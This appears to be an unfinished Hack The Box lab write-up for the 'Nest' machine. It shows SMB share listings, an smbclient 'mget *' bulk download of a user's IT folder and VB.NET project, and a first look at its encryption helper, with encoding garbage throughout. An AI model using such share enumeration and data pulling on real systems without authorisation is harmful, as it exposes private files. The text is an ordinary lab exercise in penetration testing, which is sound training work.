.. D 0 Wed Aug 7 20:42:14 2019
Docs D 0 Wed Aug 7 20:44:00 2019
Reports D 0 Tue Aug 6 14:45:40 2019
VB Projects D 0 Tue Aug 6 15:41:55 2019
\IT\Carl\Docs
. D 0 Wed Aug 7 20:44:00 2019
.. D 0 Wed Aug 7 20:44:00 2019
ip.txt A 56 Wed Aug 7 20:44:16 2019
mmc.txt A 73 Wed Aug 7 20:43:42 2019
\IT\Carl\Reports
. D 0 Tue Aug 6 14:45:40 2019
.. D 0 Tue Aug 6 14:45:40 2019
\IT\Carl\VB Projects
. D 0 Tue Aug 6 15:41:55 2019
.. D 0 Tue Aug 6 15:41:55 2019
Production D 0 Tue Aug 6 15:07:13 2019
WIP D 0 Tue Aug 6 15:47:41 2019
\IT\Carl\VB Projects\Production
. D 0 Tue Aug 6 15:07:13 2019
.. D 0 Tue Aug 6 15:07:13 2019
\IT\Carl\VB Projects\WIP
. D 0 Tue Aug 6 15:47:41 2019
.. D 0 Tue Aug 6 15:47:41 2019
RU D 0 Fri Aug 9 16:36:45 2019
\IT\Carl\VB Projects\WIP\RU
. D 0 Fri Aug 9 16:36:45 2019
It worked π. So iβll just dump the whole content in my cwd using mget
smb: \IT\Carl\> mget *
getting file \IT\Carl\Docs\ip.txt of size 56 as Docs/ip.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Carl\Docs\mmc.txt of size 73 as Docs/mmc.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner.sln of size 871 as VB Projects/WIP/RU/RUScanner.sln (1.6 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as VB Projects/WIP/RU/RUScanner/ConfigFile.vb (0.8 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Module1.vb of size 279 as VB Projects/WIP/RU/RUScanner/Module1.vb (0.5 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj of size 4828 as VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj (6.7 KiloBytes/sec) (average 1.6 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj.user of size 143 as VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user (0.2 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\SsoIntegration.vb of size 133 as VB Projects/WIP/RU/RUScanner/SsoIntegration.vb (0.2 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Utils.vb of size 4888 as VB Projects/WIP/RU/RUScanner/Utils.vb (6.8 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.Designer.vb of size 441 as VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb (0.8 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.myapp of size 481 as VB Projects/WIP/RU/RUScanner/My Project/Application.myapp (0.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\AssemblyInfo.vb of size 1163 as VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb (1.9 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.Designer.vb of size 2776 as VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb (3.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.resx of size 5612 as VB Projects/WIP/RU/RUScanner/My Project/Resources.resx (5.5 KiloBytes/sec) (average 2.3 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.Designer.vb of size 2989 as VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb (2.9 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.settings of size 279 as VB Projects/WIP/RU/RUScanner/My Project/Settings.settings (0.3 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \IT\Carl\> q
Just to get an understanding of what i downloaded i ran tree command and i see that theres a vscode project file
βββ(venv)β(mark__haxor)-[~/Desktop/B2B/HTB/Nest]
ββ$ tree
.
βββ Docs
β__ βββ ip.txt
β__ βββ mmc.txt
βββ dump
βββ Finance
βββ HR
βββ IT
βββ nmapscan
βββ Reports
βββ users
βββ VB Projects
βββ Production
βββ WIP
βββ RU
βββ RUScanner
β__ βββ bin
β__ β__ βββ Debug
β__ β__ βββ Release
β__ βββ ConfigFile.vb
β__ βββ Module1.vb
β__ βββ My Project
β__ β__ βββ Application.Designer.vb
β__ β__ βββ Application.myapp
β__ β__ βββ AssemblyInfo.vb
β__ β__ βββ Resources.Designer.vb
β__ β__ βββ Resources.resx
β__ β__ βββ Settings.Designer.vb
β__ β__ βββ Settings.settings
β__ βββ obj
β__ β__ βββ x86
β__ βββ RU Scanner.vbproj
β__ βββ RU Scanner.vbproj.user
β__ βββ SsoIntegration.vb
β__ βββ Utils.vb
βββ RUScanner.sln
17 directories, 18 files
And from there we see that the main vs studio file is RUScanner.sln
Iβll open it on vscode
Looking through the code, one of the things that jumps out to me is Utils.vb.
Itβs a class thatβs designed to provide EncryptString and DecryptString functions to the rest of the project.
I see this is called from the main code in Module1.vb1:
So i donβt really know how to go around from here β¦β¦β¦β¦β¦β¦β¦β¦β¦β¦ Iβll complete it soooon xD